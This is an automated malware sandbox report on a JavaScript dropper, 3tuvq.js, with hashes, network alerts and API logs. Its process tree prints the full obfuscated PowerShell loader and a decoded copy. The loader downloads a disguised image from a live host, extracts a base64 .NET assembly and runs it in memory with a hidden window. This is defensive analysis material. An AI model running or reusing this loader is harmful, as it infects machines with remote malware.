popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

3tuvq.js

Generic Malware Antivirus ActiveXObject PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Nov. 28, 2023, 10:07 a.m. Nov. 28, 2023, 10:09 a.m.
Size 37.7KB
Type Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
MD5 a758953be379c89a34398eb1fc1f233a
SHA256 3b15e80745d77ea0978adab892616ef94a6a28954c50864742a79b10ea2e850a
CRC32 7026179F
ssdeep 768:J3CFNPfxSP4TPxj2j6lL4ir6Nr6MLr6Kwr6vyJe8PgQViCF7AL4Jc/Sr6Nr6WCLc:J3CFNnxSAT5j2j78I9Y0b8/ViCZWsI8A
Yara
  • Javascript_ActiveXObject - Use ActiveXObject JavaScript

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\3tuvq.js

    2556

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚I♛♚♛♚9♛♚C♛♚♛♚JwBo♛♚HQ♛♚d♛♚Bw♛♚HM♛♚Og♛♚v♛♚C8♛♚dQBw♛♚Gw♛♚bwBh♛♚GQ♛♚Z♛♚Bl♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBu♛♚HM♛♚LgBj♛♚G8♛♚bQ♛♚u♛♚GI♛♚cg♛♚v♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBz♛♚C8♛♚M♛♚♛♚w♛♚DQ♛♚Lw♛♚2♛♚DY♛♚Ng♛♚v♛♚DY♛♚O♛♚♛♚z♛♚C8♛♚bwBy♛♚Gk♛♚ZwBp♛♚G4♛♚YQBs♛♚C8♛♚agBz♛♚C4♛♚agBw♛♚Gc♛♚Pw♛♚x♛♚Dc♛♚M♛♚♛♚w♛♚DE♛♚O♛♚♛♚z♛♚Dg♛♚Ng♛♚0♛♚Cc♛♚Ow♛♚k♛♚Hc♛♚ZQBi♛♚EM♛♚b♛♚Bp♛♚GU♛♚bgB0♛♚C♛♚♛♚PQ♛♚g♛♚E4♛♚ZQB3♛♚C0♛♚TwBi♛♚Go♛♚ZQBj♛♚HQ♛♚I♛♚BT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚E4♛♚ZQB0♛♚C4♛♚VwBl♛♚GI♛♚QwBs♛♚Gk♛♚ZQBu♛♚HQ♛♚Ow♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚B3♛♚GU♛♚YgBD♛♚Gw♛♚aQBl♛♚G4♛♚d♛♚♛♚u♛♚EQ♛♚bwB3♛♚G4♛♚b♛♚Bv♛♚GE♛♚Z♛♚BE♛♚GE♛♚d♛♚Bh♛♚Cg♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚KQ♛♚7♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚FQ♛♚ZQB4♛♚HQ♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚FQ♛♚ZQB4♛♚HQ♛♚LgBF♛♚G4♛♚YwBv♛♚GQ♛♚aQBu♛♚Gc♛♚XQ♛♚6♛♚Do♛♚VQBU♛♚EY♛♚O♛♚♛♚u♛♚Ec♛♚ZQB0♛♚FM♛♚d♛♚By♛♚Gk♛♚bgBn♛♚Cg♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚QgB5♛♚HQ♛♚ZQBz♛♚Ck♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚C♛♚♛♚PQ♛♚g♛♚Cc♛♚P♛♚♛♚8♛♚EI♛♚QQBT♛♚EU♛♚Ng♛♚0♛♚F8♛♚UwBU♛♚EE♛♚UgBU♛♚D4♛♚Pg♛♚n♛♚Ds♛♚J♛♚Bl♛♚G4♛♚Z♛♚BG♛♚Gw♛♚YQBn♛♚C♛♚♛♚PQ♛♚g♛♚Cc♛♚P♛♚♛♚8♛♚EI♛♚QQBT♛♚EU♛♚Ng♛♚0♛♚F8♛♚RQBO♛♚EQ♛♚Pg♛♚+♛♚Cc♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚V♛♚Bl♛♚Hg♛♚d♛♚♛♚u♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚BP♛♚GY♛♚K♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚Ck♛♚Ow♛♚k♛♚GU♛♚bgBk♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚SQBu♛♚GQ♛♚ZQB4♛♚E8♛♚Zg♛♚o♛♚CQ♛♚ZQBu♛♚GQ♛♚RgBs♛♚GE♛♚Zw♛♚p♛♚Ds♛♚J♛♚Bz♛♚HQ♛♚YQBy♛♚HQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQBn♛♚GU♛♚I♛♚♛♚w♛♚C♛♚♛♚LQBh♛♚G4♛♚Z♛♚♛♚g♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQBn♛♚HQ♛♚I♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚r♛♚D0♛♚I♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚C4♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚Ow♛♚k♛♚GI♛♚YQBz♛♚GU♛♚Ng♛♚0♛♚Ew♛♚ZQBu♛♚Gc♛♚d♛♚Bo♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQ♛♚g♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚7♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚QwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚UwB1♛♚GI♛♚cwB0♛♚HI♛♚aQBu♛♚Gc♛♚K♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚L♛♚♛♚g♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚KQ♛♚7♛♚CQ♛♚YwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚BC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚EM♛♚bwBu♛♚HY♛♚ZQBy♛♚HQ♛♚XQ♛♚6♛♚Do♛♚RgBy♛♚G8♛♚bQBC♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BT♛♚HQ♛♚cgBp♛♚G4♛♚Zw♛♚o♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚QwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚♛♚p♛♚Ds♛♚J♛♚Bs♛♚G8♛♚YQBk♛♚GU♛♚Z♛♚BB♛♚HM♛♚cwBl♛♚G0♛♚YgBs♛♚Hk♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚FI♛♚ZQBm♛♚Gw♛♚ZQBj♛♚HQ♛♚aQBv♛♚G4♛♚LgBB♛♚HM♛♚cwBl♛♚G0♛♚YgBs♛♚Hk♛♚XQ♛♚6♛♚Do♛♚T♛♚Bv♛♚GE♛♚Z♛♚♛♚o♛♚CQ♛♚YwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚BC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚KQ♛♚7♛♚CQ♛♚d♛♚B5♛♚H♛♚♛♚ZQ♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gw♛♚bwBh♛♚GQ♛♚ZQBk♛♚EE♛♚cwBz♛♚GU♛♚bQBi♛♚Gw♛♚eQ♛♚u♛♚Ec♛♚ZQB0♛♚FQ♛♚eQBw♛♚GU♛♚K♛♚♛♚n♛♚EY♛♚aQBi♛♚GU♛♚cg♛♚u♛♚Eg♛♚bwBt♛♚GU♛♚Jw♛♚p♛♚Ds♛♚J♛♚Bt♛♚GU♛♚d♛♚Bo♛♚G8♛♚Z♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚HQ♛♚eQBw♛♚GU♛♚LgBH♛♚GU♛♚d♛♚BN♛♚GU♛♚d♛♚Bo♛♚G8♛♚Z♛♚♛♚o♛♚Cc♛♚VgBB♛♚Ek♛♚Jw♛♚p♛♚C4♛♚SQBu♛♚HY♛♚bwBr♛♚GU♛♚K♛♚♛♚k♛♚G4♛♚dQBs♛♚Gw♛♚L♛♚♛♚g♛♚Fs♛♚bwBi♛♚Go♛♚ZQBj♛♚HQ♛♚WwBd♛♚F0♛♚I♛♚♛♚o♛♚Cc♛♚Z♛♚BI♛♚Gg♛♚M♛♚BM♛♚G4♛♚a♛♚♛♚z♛♚Fo♛♚MgBZ♛♚Ho♛♚T♛♚B6♛♚GM♛♚M♛♚BM♛♚Go♛♚WQ♛♚w♛♚E0♛♚aQ♛♚0♛♚Hk♛♚TwBT♛♚DQ♛♚e♛♚BP♛♚FM♛♚O♛♚B2♛♚E8♛♚bgBC♛♚D♛♚♛♚Z♛♚BH♛♚Gc♛♚PQ♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bm♛♚GQ♛♚ZgBk♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GY♛♚Z♛♚Bm♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GY♛♚Z♛♚Bm♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GE♛♚Z♛♚Bz♛♚GE♛♚Jw♛♚g♛♚Cw♛♚I♛♚♛♚n♛♚GQ♛♚ZQ♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚YwB1♛♚Cc♛♚KQ♛♚p♛♚♛♚==';$OWjuxd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($codigo.replace('♛♚','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxd"

      2696

      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/666/683/original/js.jpg?1700183864';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0Lnh3Z2YzLzc0LjY0Mi4yOS4xOS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"

        2800

Name Response Post-Analysis Lookup
apps.identrust.com
A 121.254.136.9
CNAME a1952.dscq.akamai.net
CNAME identrust.edgesuite.net
A 121.254.136.18
23.67.53.27
paste.ee
A 104.21.84.67
A 172.67.187.200
104.21.84.67
uploaddeimagens.com.br
A 104.21.45.138
A 172.67.215.45
104.21.45.138
IP Address Status Action
104.21.84.67 Active Moloch
121.254.136.9 Active Moloch
164.124.101.2 Active Moloch
172.67.215.45 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49161 -> 104.21.84.67:443 2034978 ET POLICY Pastebin-style Service (paste .ee) in TLS SNI Potential Corporate Privacy Violation
TCP 192.168.56.101:49161 -> 104.21.84.67:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49166 -> 172.67.215.45:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49161
104.21.84.67:443 		C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 CN=paste.ee 75:09:97:90:38:ad:dd:cc:0d:1b:d8:8b:02:ab:5d:a9:3b:7a:1f:1d
TLSv1
192.168.56.101:49166
172.67.215.45:443 		C=US, O=Let's Encrypt, CN=E1 CN=uploaddeimagens.com.br d4:47:9f:16:cd:db:0a:99:1e:d8:a8:20:24:9b:c9:bb:4c:62:39:71

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Exception calling "DownloadData" with "1" argument(s): "The underlying connecti
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: on was closed: Could not establish trust relationship for the SSL/TLS secure ch
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: annel."
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: At line:1 char:174
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/666/683/original/js.jp
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: g?1700183864';$webClient = New-Object System.Net.WebClient;$imageBytes = $webCl
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: ient.DownloadData <<<< ($imageUrl);$imageText = [System.Text.Encoding]::UTF8.Ge
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: tString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: ';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $start
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: Flag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: .Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBa
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: se64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: ($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.G
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: etMethod('VAI').Invoke($null, [object[]] ('dHh0Lnh3Z2YzLzc0LjY0Mi4yOS4xOS8vOnB0
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000000e3
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000000ef
1 1 0

WriteConsoleW

 buffer: Exception calling "GetString" with "1" argument(s): "Array cannot be null.
console_handle: 0x0000010f
1 1 0

WriteConsoleW

 buffer: Parameter name: bytes"
console_handle: 0x0000011b
1 1 0

WriteConsoleW

 buffer: At line:1 char:237
console_handle: 0x00000127
1 1 0

WriteConsoleW

 buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/666/683/original/js.jp
console_handle: 0x00000133
1 1 0

WriteConsoleW

 buffer: g?1700183864';$webClient = New-Object System.Net.WebClient;$imageBytes = $webCl
console_handle: 0x0000013f
1 1 0

WriteConsoleW

 buffer: ient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetStrin
console_handle: 0x0000014b
1 1 0

WriteConsoleW

 buffer: g <<<< ($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>
console_handle: 0x00000157
1 1 0

WriteConsoleW

 buffer: ';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($
console_handle: 0x00000163
1 1 0

WriteConsoleW

 buffer: endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $start
console_handle: 0x0000016f
1 1 0

WriteConsoleW

 buffer: Flag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText
console_handle: 0x0000017b
1 1 0

WriteConsoleW

 buffer: .Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBa
console_handle: 0x00000187
1 1 0

WriteConsoleW

 buffer: se64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load
console_handle: 0x00000193
1 1 0

WriteConsoleW

 buffer: ($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.G
console_handle: 0x0000019f
1 1 0

WriteConsoleW

 buffer: etMethod('VAI').Invoke($null, [object[]] ('dHh0Lnh3Z2YzLzc0LjY0Mi4yOS4xOS8vOnB0
console_handle: 0x000001ab
1 1 0

WriteConsoleW

 buffer: dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))
console_handle: 0x000001b7
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000001c3
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000001cf
1 1 0

WriteConsoleW

 buffer: You cannot call a method on a null-valued expression.
console_handle: 0x000001ef
1 1 0

WriteConsoleW

 buffer: At line:1 char:343
console_handle: 0x000001fb
1 1 0

WriteConsoleW

 buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/666/683/original/js.jp
console_handle: 0x00000207
1 1 0

WriteConsoleW

 buffer: g?1700183864';$webClient = New-Object System.Net.WebClient;$imageBytes = $webCl
console_handle: 0x00000213
1 1 0

WriteConsoleW

 buffer: ient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetStrin
console_handle: 0x0000021f
1 1 0

WriteConsoleW

 buffer: g($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$sta
console_handle: 0x0000022b
1 1 0

WriteConsoleW

 buffer: rtIndex = $imageText.IndexOf <<<< ($startFlag);$endIndex = $imageText.IndexOf($
console_handle: 0x00000237
1 1 0

WriteConsoleW

 buffer: endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $start
console_handle: 0x00000243
1 1 0

WriteConsoleW

 buffer: Flag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText
console_handle: 0x0000024f
1 1 0

WriteConsoleW

 buffer: .Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBa
console_handle: 0x0000025b
1 1 0

WriteConsoleW

 buffer: se64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load
console_handle: 0x00000267
1 1 0

WriteConsoleW

 buffer: ($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.G
console_handle: 0x00000273
1 1 0

WriteConsoleW

 buffer: etMethod('VAI').Invoke($null, [object[]] ('dHh0Lnh3Z2YzLzc0LjY0Mi4yOS4xOS8vOnB0
console_handle: 0x0000027f
1 1 0

WriteConsoleW

 buffer: dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))
console_handle: 0x0000028b
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : InvalidOperation: (IndexOf:String) [], RuntimeEx
console_handle: 0x00000297
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00586460
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005869e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005869e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005869e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00586560
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00586560
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00586560
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00586560
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00586560
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00586560
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00586020
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00586020
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00586020
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005869e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005869e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005869e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005868e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005869e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005869e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005869e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005869e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005869e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005869e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005869e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00586160
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00586160
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00586160
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00586160
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00586160
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00586160
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00586160
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00586160
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00586160
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00586160
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00586160
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00586160
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00586160
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00586160
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00586de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00586de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006518b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006522b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006522b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006522b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00651970
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00651970
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00651970
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00651970
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00651970
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00651970
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
request GET https://paste.ee/d/Oe5nV
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 2228224
stack_dep_bypass: 0
